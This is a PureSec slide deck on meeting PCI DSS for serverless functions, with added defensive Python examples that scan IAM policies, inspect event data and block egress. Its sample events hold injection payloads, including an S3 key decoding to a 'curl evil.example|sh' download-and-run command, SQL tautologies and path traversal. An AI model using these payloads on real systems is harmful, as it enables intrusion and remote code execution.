PCI Compliance & Serverless: Everything You Need To Know
Ory Segal (CTO), Ron Harnik (Head of Marketing)
Agenda
• Serverless in a nutshell
• The Shared Model of Responsibility
• Serverless AppSec: The Times They Are a-Changin'
• PCI DSS Applicability to Serverless
• PCI DSS / Serverless: Challenges
Why Serverless?
Compute as a Utility
Serverless Benefits
• No servers to manage
• Continuous scaling
• Sub-second metering
• Fewer security responsibilities
Serverless (Over)Simplified
Figure: code from a repository is deployed as a function; event sources (a REST API, cloud resources, ...) trigger it; the function interacts with cloud resources and produces its output.
Shared Model Of Responsibility
Cloud provider: responsible for security "of" the cloud
• Regions, availability zones, edge locations
• Compute, storage, database, network
• Operating system + virtual machines + containers
Application owner: responsible for security "in" the cloud
• Applications (functions)
• Identity & access management, cloud services configuration
• Client-side data, data in cloud, data in transit
Security Responsibility: When You Own The Infrastructure (IaaS)
Cloud provider (8%, 2 of the 25 items):
• Physical infrastructure, access restrictions to physical perimeter and hardware
• Secure configuration of infrastructure devices and systems
Application owner (92%, 23 of the 25 items):
• Regularly testing the security of all systems/processes (OS, services)
• Identification and authentication of access to systems (OS, services)
• Patching and fixing flaws in OS
• Hardening OS and services
• Protecting all systems against malware and backdoors
• Patching and fixing flaws in runtime environment and related software packages
• Exploit prevention and memory protection
• Network segmentation
• Tracking and monitoring all network resources and access
• Installation and maintenance of network firewalls
• Network-layer DoS protection
• Authentication of users
• Authorization controls when accessing application and data
• Log and maintain audit trails of all access to application and data
• Deploy an application layer firewall for event-data inspection
• Detect and fix vulnerabilities in third-party dependencies
• Use least-privileged IAM roles and permissions
• Enforce legitimate application behavior
• Data leak prevention
• Scan code and configurations statically during development
• Maintain serverless/cloud asset inventory
• Remove obsolete/unused cloud services and functions
• Continuously monitor errors and security incidents
http://bit.ly/faas-vs-iaas
Security Responsibility: When You Adopt Serverless
Cloud provider (52%, 13 of the 25 items):
• Physical infrastructure, access restrictions to physical perimeter and hardware
• Secure configuration of infrastructure devices and systems
• Regularly testing the security of all systems/processes (OS, services)
• Identification and authentication of access to systems (OS, services)
• Patching and fixing flaws in OS
• Hardening OS and services
• Protecting all systems against malware and backdoors
• Patching and fixing flaws in runtime environment and related software packages
• Exploit prevention and memory protection
• Network segmentation
• Tracking and monitoring all network resources and access
• Installation and maintenance of network firewalls
• Network-layer DoS protection
Application owner (48%, 12 of the 25 items):
• Authentication of users
• Authorization controls when accessing application and data
• Log and maintain audit trails of all access to application and data
• Deploy an application layer firewall for event-data inspection
• Detect and fix vulnerabilities in third-party dependencies
• Use least-privileged IAM roles and permissions
• Enforce legitimate application behavior
• Data leak prevention
• Scan code and configurations statically during development
• Maintain serverless/cloud asset inventory
• Remove obsolete/unused cloud services and functions
• Continuously monitor errors and security incidents
Top Risks for Serverless Applications (http://bit.ly/csa-top-12)
SAS-1  Function event-data injection
SAS-2  Broken authentication
SAS-3  Insecure serverless deployment configuration
SAS-4  Over-privileged function permissions
SAS-5  Inadequate function monitoring
SAS-6  Insecure 3rd party dependencies
SAS-7  Insecure app secrets storage
SAS-8  DoS & financial resource exhaustion
SAS-9  Serverless business logic manipulation
SAS-10 Improper exception handling & error messages
SAS-11 Legacy (obsolete) functions & cloud resources
SAS-12 Cross-execution data persistency
The Need For Serverless-Native Protection
Traditional security protects applications by being deployed on networks and servers:
• Network layer: NG-FW (inbound), WSG (outbound), IPS
• Endpoint: EPP, behavioral protection
• Application layer: WAF (layer 7)
Serverless: the application owner doesn't have any control over the infrastructure, only over the functions themselves.
Traditional protections cannot be deployed on serverless.
Wait... Does PCI DSS Even Apply to Serverless Apps?
PCI DSS Applicability to FaaS / Serverless
• PCI DSS requirements & assessment procedures are still very much relevant to applications built on public-cloud FaaS
• Public-cloud FaaS surfaces certain technical challenges related to the ability of organizations to comply using existing approaches
• The "PCI SSC Cloud Computing Guidelines" shed light on the challenges and technical limitations of existing solutions; however, they don't explicitly discuss FaaS (only IaaS, PaaS, SaaS)
Serverless & PCI: Where to Start?
https://www.pcisecuritystandards.org/pdfs/PCI_SSC_Cloud_Guidelines_v3.pdf
⚠️ "Use of a PCI DSS compliant Provider does not automatically result in PCI DSS compliance for the Customers"
⚠️ "Even where a cloud service is validated for certain PCI DSS requirements, this validation does not automatically transfer to the Customer environments within that cloud service"
"This guidance is intended for organizations using, or thinking of using, providing or assessing cloud technologies. It provides guidance on the use of cloud technologies and considerations for maintaining security controls in cloud environments"
Requirement 1
Challenge #1: Network Access vs. API Access
• In FaaS, the network is abstracted away and is no longer something the customer configures (the exception is a function attached to a customer VPC, whose egress is still governed by that VPC's security groups and routing)
• Network traffic is replaced by application-layer APIs + cloud APIs
• Access is controlled by IAM permissions
• Inbound traffic is mostly replaced by cloud event-source triggers
• Outbound traffic from the serverless runtime is still possible
"As web services and APIs are by nature publicly accessible, their security is critical to the security of the resources to which they provide access. If not properly developed, managed and secured, these interfaces can be exploited or compromised, resulting in unexpected behavior and potentially unauthorized access" (PCI SSC Cloud Computing Guidelines)
Since firewalls/routers cannot be deployed by customers of public-cloud FaaS, there are technical challenges for requirements 1.2.1 (Restrict inbound and outbound traffic...) and 1.3.4 (Do not allow unauthorized outbound traffic).
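The "who can invoke?" question is answerable from the deployment template, before anything is deployed. Below is an added example (not the deck's or PureSec's code) of a small static check over a CloudFormation/SAM-style template held in memory: it flags wildcard actions and resources in a function's execution role, and invoke grants that are public or not scoped to a source. The template contents, account ID, table name and API identifiers are constructed for the demo; the second template is the same function at least privilege.

```python
"""Static scan of IAM roles and invoke permissions in a serverless template.

Added example (not the deck's or PureSec's code). Operates on an in-memory
CloudFormation/SAM-style template; every identifier below is made up.
"""
from typing import Any, Dict, List

# Constructed sample: an over-privileged role and a public invoke grant.
OVERPRIVILEGED: Dict[str, Any] = {
    "Resources": {
        "PaymentFnRole": {
            "Type": "AWS::IAM::Role",
            "Properties": {"Policies": [{
                "PolicyName": "inline",
                "PolicyDocument": {"Statement": [
                    {"Effect": "Allow", "Action": "*", "Resource": "*"},
                ]},
            }]},
        },
        "PaymentFnInvoke": {
            "Type": "AWS::Lambda::Permission",
            "Properties": {
                "Action": "lambda:InvokeFunction",
                "FunctionName": {"Ref": "PaymentFn"},
                "Principal": "*",  # anyone, from any account, may invoke
            },
        },
    }
}

# Same function at least privilege: named actions, one table, invoke only from one API route.
LEAST_PRIVILEGE: Dict[str, Any] = {
    "Resources": {
        "PaymentFnRole": {
            "Type": "AWS::IAM::Role",
            "Properties": {"Policies": [{
                "PolicyName": "inline",
                "PolicyDocument": {"Statement": [{
                    "Effect": "Allow",
                    "Action": ["dynamodb:GetItem", "dynamodb:PutItem"],
                    "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/Payments",
                }]},
            }]},
        },
        "PaymentFnInvoke": {
            "Type": "AWS::Lambda::Permission",
            "Properties": {
                "Action": "lambda:InvokeFunction",
                "FunctionName": {"Ref": "PaymentFn"},
                "Principal": "apigateway.amazonaws.com",
                "SourceArn": "arn:aws:execute-api:us-east-1:123456789012:a1b2c3/prod/POST/pay",
            },
        },
    }
}


def _as_list(value: Any) -> List[Any]:
    return value if isinstance(value, list) else [value]


def _scan_role(name: str, props: Dict[str, Any]) -> List[str]:
    """Flag Allow statements whose Action or Resource is a wildcard."""
    findings: List[str] = []
    for policy in props.get("Policies", []):
        for st in _as_list(policy.get("PolicyDocument", {}).get("Statement", [])):
            if st.get("Effect") != "Allow":
                continue
            actions = [str(a) for a in _as_list(st.get("Action", []))]
            resources = [str(r) for r in _as_list(st.get("Resource", []))]
            wild = [a for a in actions if a == "*" or a.endswith(":*")]
            if wild:
                findings.append(f"{name}: wildcard action(s) {wild}")
            if "*" in resources:
                findings.append(f"{name}: Resource '*' for actions {actions}")
    return findings


def _scan_permission(name: str, props: Dict[str, Any]) -> List[str]:
    """Flag invoke grants that are public or not pinned to a SourceArn/SourceAccount."""
    principal = props.get("Principal")
    if isinstance(principal, dict):  # e.g. {"AWS": "*"}
        principal = next(iter(principal.values()), None)
    scoped = "SourceArn" in props or "SourceAccount" in props
    if principal == "*" and not scoped:
        return [f"{name}: lambda:InvokeFunction granted to Principal '*' (public invoke)"]
    if isinstance(principal, str) and principal.endswith(".amazonaws.com") and not scoped:
        # The same service in any AWS account could trigger this function (confused deputy).
        return [f"{name}: service principal {principal} without SourceArn/SourceAccount"]
    return []


def scan_template(template: Dict[str, Any]) -> List[str]:
    """Return human-readable findings for over-privileged roles and invoke grants."""
    findings: List[str] = []
    for name, res in template.get("Resources", {}).items():
        props = res.get("Properties", {})
        if res.get("Type") == "AWS::IAM::Role":
            findings += _scan_role(name, props)
        elif res.get("Type") == "AWS::Lambda::Permission":
            findings += _scan_permission(name, props)
    return findings


if __name__ == "__main__":
    for finding in scan_template(OVERPRIVILEGED):
        print("FINDING:", finding)
    print("least-privilege findings:", scan_template(LEAST_PRIVILEGE))
```

A check like this belongs in CI, on the template rather than on the deployed account, so that a wildcard role or a public invoke grant fails the build; the deployed account still needs a separate inventory scan to catch grants added outside the pipeline.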
Requirements 5 & 6
Challenge #2: User Access Goes Beyond HTTP/Web
• Serverless provides a rich set of cloud-native event inputs (dozens). Web traffic is not the most common event source
• Files are less relevant as a malware vector, but other inputs may still behave as malware
• WAFs provide incomplete protection: they only see the HTTP event sources
• SAST solutions are ineffective: the logic spans functions, events and cloud services, and SAST doesn't scan infrastructure-as-code or IAM permissions
• Already-deployed functions also require scanning for vulnerable dependencies (SCA)
• DAST is ineffective for non-web events
Technical challenges for requirements: 5 (Protect all systems against malware), 5.1, 6 (Develop and maintain secure systems & applications), 6.2 (Ensure that all system components and software are protected from known vulnerabilities), 6.6 (Manual or automated application vulnerability security assessment tools, or an automated technical solution that detects and prevents web-based attacks, for example a WAF)
Serverless Application Inputs (Events)
• Direct invoke (24%)
• Queues & streams (21%)
• API Gateway (14%)
• File storage (13%)
• Notifications (13%)
• Logs (12%)
• Database (4%)
• ... 37 other sources
A WAF sits in front of the API Gateway path only; every other event source reaches the function without passing through it.
Estimation based on https://www.slideshare.net/ChrisMunns/serverless-is-dead-132954772
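The point of the event-source breakdown is that a function's untrusted input arrives in many shapes, and only the API Gateway shape ever crosses a WAF. The following added example (not the deck's or PureSec's code) normalizes API Gateway, SQS, S3 and SNS events down to their attacker-influenced strings and runs the same inspection over all of them, then shows the preventive fix for the S3 case: an object key used to build a shell command is allow-listed and passed as a single argv element instead. The sample events, the signature list and the thumbnail command are constructed for the demo; event field names follow the AWS Lambda event formats for those sources.

```python
"""Inspect attacker-influenced event data across several event sources.

Added example (not the deck's or PureSec's code). Event shapes follow the AWS
Lambda event formats for API Gateway REST proxy, SQS, S3 and SNS; the sample
events, signatures and the thumbnail command are constructed for the demo.
"""
import json
import re
from typing import Dict, Iterator, List, Tuple
from urllib.parse import unquote_plus

# Constructed events. The SQS body and the S3 object key carry injection payloads.
EVENTS: Dict[str, dict] = {
    "api": {
        "httpMethod": "POST", "path": "/pay",
        "queryStringParameters": {"order": "42"},
        "body": json.dumps({"card_token": "tok_abc", "note": "thanks"}),
    },
    "sqs": {"Records": [{"eventSource": "aws:sqs", "body": '{"order": "42 OR 1=1"}'}]},
    "s3": {"Records": [{"eventSource": "aws:s3", "s3": {
        "bucket": {"name": "receipts"},
        # S3 URL-encodes keys; this one decodes to 'inv 001.pdf; curl evil.example|sh'
        "object": {"key": "inv+001.pdf%3B+curl+evil.example%7Csh"}}}]},
    "sns": {"Records": [{"EventSource": "aws:sns", "Sns": {"Message": "refund 42"}}]},
}

# Illustrative signatures only; matching is a detective control, not the fix.
SIGNATURES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("shell-metachar", re.compile(r"[;|&`]|\$\(")),
    ("sqli-tautology", re.compile(r"(?i)\bor\b\s+\d+\s*=\s*\d+|'\s*or\s*'")),
    ("path-traversal", re.compile(r"\.\./")),
]


def untrusted_fields(event: dict) -> Iterator[Tuple[str, str]]:
    """Yield (source:field, value) for every string an outside party can influence."""
    if "httpMethod" in event:  # API Gateway proxy integration
        for k, v in (event.get("queryStringParameters") or {}).items():
            yield f"api:query.{k}", str(v)
        for k, v in (event.get("pathParameters") or {}).items():
            yield f"api:path.{k}", str(v)
        if event.get("body"):
            yield "api:body", str(event["body"])
        return
    for rec in event.get("Records", []):
        src = rec.get("eventSource") or rec.get("EventSource")
        if src == "aws:sqs":
            yield "sqs:body", rec["body"]
        elif src == "aws:s3":
            # Inspect the decoded key, i.e. the value the handler will actually use.
            yield "s3:key", unquote_plus(rec["s3"]["object"]["key"])
        elif src == "aws:sns":
            yield "sns:message", rec["Sns"]["Message"]


def inspect_event(event: dict) -> List[str]:
    """Return '<field> matched <rule>' per hit; an empty list means nothing was flagged."""
    return [f"{field} matched {name}"
            for field, value in untrusted_fields(event)
            for name, rx in SIGNATURES if rx.search(value)]


# Preventive control for the S3 case: allow-list the key and never go through a shell.
SAFE_KEY = re.compile(r"[A-Za-z0-9._/-]{1,256}")


def key_is_safe(key: str) -> bool:
    return bool(SAFE_KEY.fullmatch(key)) and ".." not in key


def thumbnail_command(key: str) -> List[str]:
    """Hardened replacement for the vulnerable pattern
        os.system(f"convert /tmp/{key} -resize 128x128 /tmp/thumb.png")
    where a key like 'inv 001.pdf; curl evil.example|sh' runs the attacker's command."""
    if not key_is_safe(key):
        raise ValueError(f"rejected object key: {key!r}")
    return ["convert", f"/tmp/{key}", "-resize", "128x128", "/tmp/thumb.png"]


if __name__ == "__main__":
    for name, event in EVENTS.items():
        print(name, inspect_event(event) or "clean")
    key = next(v for f, v in untrusted_fields(EVENTS["s3"]) if f == "s3:key")
    print("key accepted:", key_is_safe(key))
```

The inspection function is what a serverless-native firewall has to do for every trigger type; the allow-list plus argv list is what the function itself should do regardless, because signatures miss payloads the rules did not anticipate.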
Back to the Drawing Board
FaaS applications require a different security approach
• The approach must be serverless-centric, and should include the following:
• Serverless-oriented security testing:
  • Ability to scan infrastructure-as-code & IAM roles, permissions, cloud service configuration
  • Ability to detect known vulnerabilities in OSS packages of deployed functions
• Serverless-native application firewall:
  • Capable of detecting & preventing attacks via all cloud-native event source triggers
  • Can scale and provide app security for concurrent executions across regions
• Serverless-dedicated behavioral protection:
  • Capable of preventing unwanted behavior and malicious processes
  • Can enforce strict access permissions to prevent unauthorized cloud API access
  • Can block outbound traffic and data leakage to the Internet or other cloud accounts
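Of the behavioral controls listed above, "block outbound traffic and data leakage" is the one a FaaS customer cannot place on a firewall, because there is no firewall to place it on; it has to live inside the runtime. The following added example (not the deck's or PureSec's code) shows one way to do that in a Python function: it wraps socket.getaddrinfo with a host allow-list so that a connection to any other host, including an IP literal, fails before DNS resolution or a TCP handshake. The hostnames and the policy are constructed for the demo. The hook covers libraries that look up socket.getaddrinfo at call time (http.client, urllib3 and therefore requests and botocore); a library that bound getaddrinfo at import time, or native code with its own resolver, would not be covered.

```python
"""In-process egress allow-list for a Python function.

Added example (not the deck's or PureSec's code). Hostnames and the policy are
constructed for the demo.
"""
import socket
from typing import Iterable, Set

_ORIGINAL_GETADDRINFO = socket.getaddrinfo


def egress_allowed(host: str, allow: Iterable[str]) -> bool:
    """Exact host match, or parent-domain match for entries that start with a dot."""
    host = host.lower().rstrip(".")
    for entry in allow:
        entry = entry.lower()
        if entry.startswith("."):
            if host.endswith(entry):
                return True
        elif host == entry:
            return True
    return False


def install_egress_guard(allow: Iterable[str]) -> None:
    """Wrap socket.getaddrinfo so a connection to a non-allow-listed host fails
    before any DNS lookup or TCP handshake. IP literals are checked as hosts too,
    so they are blocked unless explicitly listed."""
    allowed: Set[str] = {a.lower() for a in allow}

    def guarded(host, port, *args, **kwargs):
        if host is not None:  # None means 'bind locally', not an egress attempt
            name = host.decode() if isinstance(host, bytes) else str(host)
            if not egress_allowed(name, allowed):
                raise PermissionError(f"egress to {name}:{port} blocked by function policy")
        return _ORIGINAL_GETADDRINFO(host, port, *args, **kwargs)

    socket.getaddrinfo = guarded


def uninstall_egress_guard() -> None:
    socket.getaddrinfo = _ORIGINAL_GETADDRINFO


def connection_outcome(host: str, port: int = 443) -> str:
    """'blocked' if the guard refused the host; otherwise the raw socket result."""
    try:
        socket.create_connection((host, port), timeout=0.05).close()
    except PermissionError:  # raised by the guard, before any network I/O
        return "blocked"
    except OSError:
        return "network-error"
    return "connected"


# Constructed policy for a payment function: its own API plus AWS service endpoints.
FUNCTION_EGRESS_POLICY = ["payments.example.com", ".amazonaws.com"]

if __name__ == "__main__":
    install_egress_guard(FUNCTION_EGRESS_POLICY)
    try:
        print("evil.example ->", connection_outcome("evil.example"))    # blocked
        print("203.0.113.10 ->", connection_outcome("203.0.113.10"))    # blocked
        print("sqs.us-east-1.amazonaws.com allowed?",
              egress_allowed("sqs.us-east-1.amazonaws.com", FUNCTION_EGRESS_POLICY))
    finally:
        uninstall_egress_guard()
```

Install the guard once at module load, before the handler runs, so the policy applies to every invocation on that execution environment; the PermissionError it raises is also the event to log for requirement 1.3.4 evidence, since it records the exact host the function tried to reach.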
PureSec SSP:
• Serverless posture management: serverless asset inventory, vulnerability management, detection of IAM & configuration issues, CI/CD integration
• Runtime protection: serverless application firewall, behavioral protection with ML, blazing fast, painless deployment
• Security visibility: real-time app security visibility, deep forensic analysis, SIEM integrations
© 2019 PURESEC
How Can PureSec Fill Your PCI DSS Gaps?

Requirement 1
• Challenge: cannot deploy firewalls & routers; inbound traffic is now event triggers; cannot prevent outbound traffic
• Solution: least-privileged IAM permissions (who can invoke?) via automated static scanning; block unauthorized outbound traffic through behavioral protection

Requirement 5
• Challenge: cannot deploy anti-malware and endpoint prevention
• Solution: enforce known-good behavior and prevent malicious actions through behavioral protection; block attempts to inject code through the Serverless App Firewall

Requirement 6
• Challenge: SAST alone is ineffective; SAST doesn't cover deployed assets; DAST is ineffective; WAF provides extremely partial coverage
• Solution: automated scanning of serverless code, configuration, IAM, and OSS; full coverage over all event source types with the Serverless App Firewall
 

PCI & Serverless - Everything you need to know

  • 1. PCI Compliance & Serverless: Everything You Need To Know. Ory Segal (CTO), Ron Harnik (Head of Marketing)
  • 2. Agenda
     Serverless in a nutshell
     The Shared Model of Responsibility
     Serverless AppSec: The Times They Are a-Changin’
     PCI DSS Applicability to Serverless
     PCI DSS / Serverless: Challenges
  • 4. Compute as a Utility
  • 5. Serverless Benefits: no servers to manage; continuous scaling; sub-second metering; fewer security responsibilities
  • 6. Serverless (Over)Simplified: diagram of a function {;} deployed from a code repository, triggered by event sources (REST API, cloud resources, …), interacting with cloud resources, and producing output
  • 7. Shared Model Of Responsibility
     Cloud provider, responsible for security “of” the cloud: regions, availability zones, edge locations; compute, storage, database, network; operating system + virtual machines + containers
     Application owner, responsible for security “in” the cloud: applications (functions); identity & access management; cloud services configuration; client-side data; data in cloud; data in transit
  • 8. Security Responsibility: When You Own The Infrastructure (IaaS)
     Physical infrastructure, access restrictions to physical perimeter and hardware
     Secure configuration of infrastructure devices and systems
     Regularly testing the security of all systems/processes (OS, services)
     Identification and authentication of access to systems (OS, services)
     Patching and fixing flaws in OS
     Hardening OS and services
     Protecting all systems against malware and backdoors
     Patching and fixing flaws in runtime environment and related software packages
     Exploit prevention and memory protection
     Network segmentation
     Tracking and monitoring all network resources and access
     Installation and maintenance of network firewalls
     Network-layer DoS protection
     Authentication of users
     Authorization controls when accessing application and data
     Log and maintain audit trails of all access to application and data
     Deploy an application layer firewall for event-data inspection
     Detect and fix vulnerabilities in third-party dependencies
     Use least-privileged IAM roles and permissions
     Enforce legitimate application behavior
     Data leak prevention
     Scan code and configurations statically during development
     Maintain serverless/cloud asset inventory
     Remove obsolete/unused cloud services and functions
     Continuously monitor errors and security incidents
    Chart: 8% / 92% (legend: application owner, cloud provider). http://bit.ly/faas-vs-iaas
  • 9. Security Responsibility: When You Adopt Serverless. The same 25 responsibilities as slide 8, re-divided between the parties. Chart: 52% / 48% (legend: application owner, cloud provider)
  • 10. Top Risks for Serverless Applications (http://bit.ly/csa-top-12)
    SAS-1 Function event-data injection
    SAS-2 Broken authentication
    SAS-3 Insecure serverless deployment
    SAS-4 Over-privileged function permissions
    SAS-5 Inadequate function monitoring
    SAS-6 Insecure 3rd party dependencies
    SAS-7 Insecure app secrets storage
    SAS-8 DoS & financial exhaustion
    SAS-9 Serverless business logic manipulation
    SAS-10 Improper exceptions handling & errors
    SAS-11 Legacy functions & cloud resources
    SAS-12 Cross-execution data persistency
  • 11. The Need For Serverless-Native Protection
     Traditional security: protects applications by being deployed on networks and servers
     Serverless: the application owner doesn't have any control over the infrastructure
  • 14. PCI DSS Applicability to FaaS / Serverless
     PCI DSS requirements & assessment procedures are still very much relevant to applications built on public-cloud FaaS
     Public-cloud FaaS surfaces certain technical challenges related to the ability of organizations to comply using existing approaches
     “PCI SSC Cloud Computing Guidelines” sheds light on the challenges and technical limitations of existing solutions, however it doesn’t explicitly discuss FaaS (only IaaS, PaaS, SaaS)
  • 15. Serverless & PCI: Where to Start? https://www.pcisecuritystandards.org/pdfs/PCI_SSC_Cloud_Guidelines_v3.pdf
    This guidance is intended for organizations using, or thinking of using, providing or assessing cloud technologies. It provides guidance on the use of cloud technologies and considerations for maintaining security controls in cloud environments.
    ⚠️ “Use of a PCI DSS compliant Provider does not automatically result in PCI DSS compliance for the Customers”
    ⚠️ “Even where a cloud service is validated for certain PCI DSS requirements, this validation does not automatically transfer to the Customer environments within that cloud service”
  • 17. Challenge #1: Network Access vs. API Access
     In FaaS, the network is abstracted and is no longer relevant to customers
     Network traffic is replaced by application layer APIs + cloud APIs
     Access is controlled by IAM permissions
     Inbound traffic is mostly replaced by cloud event source triggers
     Outbound traffic from the serverless runtime is still possible
    “As web services and APIs are by nature publicly accessible, their security is critical to the security of the resources to which they provide access. If not properly developed, managed and secured, these interfaces can be exploited or compromised, resulting in unexpected behavior and potentially unauthorized access” (PCI SSC Cloud Computing Guidelines)
    Since firewalls/routers cannot be deployed by customers of public-cloud FaaS, there are technical challenges for requirements: 1.2.1 (Restrict inbound and outbound traffic…), 1.3.4 (Do not allow unauthorized outbound traffic)
  • 19. Challenge #2: User Access Goes Beyond HTTP/Web
     Serverless provides a rich set of cloud-native event inputs (dozens). Web traffic is not the most common event source
     Files are less relevant as a malware vector; other inputs may still behave as malware
     WAFs provide incomplete security protection
     SAST solutions are ineffective (logic spans over functions, events and cloud services). They also don’t scan Infrastructure-as-code and IAM permissions
     Already-deployed functions also require scanning for vulnerabilities (SCA)
     DAST is ineffective for non-web events
    Technical challenges for requirements: 5 (Protect all systems against malware), 5.1, 6 (Develop and maintain secure systems & applications), 6.2 (Ensure that all system components and software are protected from known vulnerabilities), 6.6 (Manual or automated application vulnerability security assessment tools, automated technical solution that detects and prevents web-based attacks, for example a WAF)
  • 20. Serverless Application Inputs (Events): Direct Invoke (24%), Queues & Streams (21%), API Gateway (14%), File Storage (13%), Notifications (13%), Logs (12%), Database (4%), 37 other sources (…). The diagram places a WAF on the API Gateway input. Estimation based on https://www.slideshare.net/ChrisMunns/serverless-is-dead-132954772
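Slides 19 and 20 make the point that a WAF only ever sees the API Gateway share of a function's inputs. The following added example (not code from the deck or from PureSec; event shapes follow the AWS API Gateway proxy, SQS and S3 formats, the rule set and sample events are constructed) pulls the attacker-controlled strings out of each event type and runs one inspection pass over all of them, tagging which ones a WAF could have covered.

```python
"""Event-source-aware extraction of attacker-controlled input.

Added example for this page (not code from the deck or from PureSec): a
single inspection pass over the untrusted strings a Lambda function receives,
whichever event source delivered them. A WAF sees only the API Gateway path;
the SQS and S3 paths reach the function with no such filter. The rule set and
the event samples are constructed for illustration.
"""
import re
from urllib.parse import unquote_plus

# Defensive rule: command-separator and path-traversal markers, checked on
# every input string regardless of which event carried it.
SUSPICIOUS = re.compile(r"(;|&&|\|\||\$\(|`|\.\./)")


def untrusted_strings(event):
    """Return (source, [strings]) for the event shapes handled here."""
    if "httpMethod" in event:                         # API Gateway proxy event
        params = event.get("queryStringParameters") or {}
        return "api-gateway", list(params.values()) + [event.get("body") or ""]
    records = event.get("Records", [])
    source = records[0].get("eventSource") if records else None
    if source == "aws:sqs":
        return "sqs", [r["body"] for r in records]
    if source == "aws:s3":                            # keys arrive URL-encoded
        return "s3", [unquote_plus(r["s3"]["object"]["key"]) for r in records]
    return "direct-invoke", [str(v) for v in event.values()]


def inspect(event):
    """Label the source, whether a WAF could have seen it, and rule hits."""
    source, values = untrusted_strings(event)
    hits = [v for v in values if SUSPICIOUS.search(v)]
    return {"source": source, "waf_covered": source == "api-gateway", "hits": hits}


# Constructed events in the shape each AWS service delivers.
API_EVENT = {"httpMethod": "GET", "queryStringParameters": {"q": "hello"}, "body": None}
SQS_EVENT = {"Records": [{"eventSource": "aws:sqs", "body": "order-42; id"}]}
S3_EVENT = {"Records": [{"eventSource": "aws:s3",
                         "s3": {"object": {"key": "uploads/..%2F..%2Fetc%2Fpasswd"}}}]}
```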
  • 21. Back to the Drawing Board
  • 22. FaaS applications require a different security approach
     The approach must be Serverless-centric, and should include the following:
     Serverless oriented security testing:
       Ability to scan Infrastructure-as-code & IAM roles, permissions, cloud service config.
       Ability to detect known vulnerabilities in OSS packages of deployed functions
     Serverless-native application firewall:
       Capable of detecting & preventing attacks via all cloud-native event source triggers
       Can scale and provide app security for concurrent executions across regions
     Serverless dedicated behavioral protection:
       Capable of preventing unwanted behavior and malicious processes
       Can enforce strict access permissions to prevent unauthorized cloud API access
       Can block outbound traffic and data leakage to the Internet or other cloud accounts
  • 23. PureSec SSP
    Serverless Posture Management: serverless asset inventory; vulnerability management; detect IAM & configuration issues; CI/CD integration
    Runtime Protection: serverless application firewall; behavioral protection w/ ML; blazing fast; painless deployment
    Security Visibility: real time app security visibility; deep forensic analysis; SIEM integrations
    © 2019 PureSec
  • 24. How Can PureSec Fill Your PCI DSS Gaps?
    Requirement 1
      Challenge: cannot deploy firewalls & routers; inbound traffic is now event triggers; cannot prevent outbound traffic
      Solution: least privileged IAM permissions (who can invoke?) via automated static scanning; block unauthorized outbound traffic through behavioral protection
    Requirement 5
      Challenge: cannot deploy anti-malware and endpoint prevention
      Solution: enforce known good behavior and prevent malicious actions through behavioral protection; block attempts to inject code through Serverless App Firewall
    Requirement 6
      Challenge: SAST alone is ineffective; SAST doesn’t cover deployed assets; DAST is ineffective; WAF provides extremely partial coverage
      Solution: automated scanning of serverless code, configuration, IAM, and OSS; full coverage over all event source types with Serverless App Firewall
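Slide 22 calls for scanning IAM roles and permissions statically, and the Requirement 1 row above relies on least-privileged IAM permissions found by automated static scanning. The added example below (not PureSec's or the deck's code; SAMPLE_POLICY is a constructed AWS IAM policy document) is the core of such a check: it walks the Allow statements and flags wildcard actions, wildcard resources and NotAction/NotResource grants, the over-privileged-function pattern listed as SAS-4.

```python
"""Static least-privilege check for a Lambda execution-role policy.

Added example for this page, not PureSec's or the deck's code: flags the
over-privileged-permission pattern (CSA SAS-4 / the Requirement 1 row above)
in an AWS IAM policy document. SAMPLE_POLICY is constructed.
"""
import json


def _as_list(value):
    """IAM accepts a bare string or a list for Action/Resource; normalise."""
    return value if isinstance(value, list) else [value]


def find_overprivileged(policy_json):
    """Return (statement_index, reason) findings for Allow statements.

    Rules: action '*' or 'service:*', Resource '*', and NotAction/NotResource
    (which grant everything except what is listed). Deny statements are skipped.
    """
    findings = []
    statements = _as_list(json.loads(policy_json).get("Statement", []))
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        if "NotAction" in stmt or "NotResource" in stmt:
            findings.append((i, "NotAction/NotResource grants everything not listed"))
        for action in _as_list(stmt.get("Action", [])):
            if action == "*":
                findings.append((i, "action '*' grants every API in every service"))
            elif action.endswith(":*"):
                findings.append((i, f"service-wide wildcard {action}"))
        if "*" in _as_list(stmt.get("Resource", [])):
            findings.append((i, "Resource '*' (any resource, e.g. any function invokable)"))
    return findings


# Constructed sample: a typical "make it work" execution-role policy.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "logs:*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["s3:*"],
         "Resource": "arn:aws:s3:::orders-bucket/*"},
        {"Effect": "Allow", "Action": "dynamodb:GetItem",
         "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/Orders"},
        {"Effect": "Allow", "Action": "lambda:InvokeFunction", "Resource": "*"},
    ],
})
```

Running it against SAMPLE_POLICY reports four findings across statements 0, 1 and 3; only the scoped DynamoDB read passes.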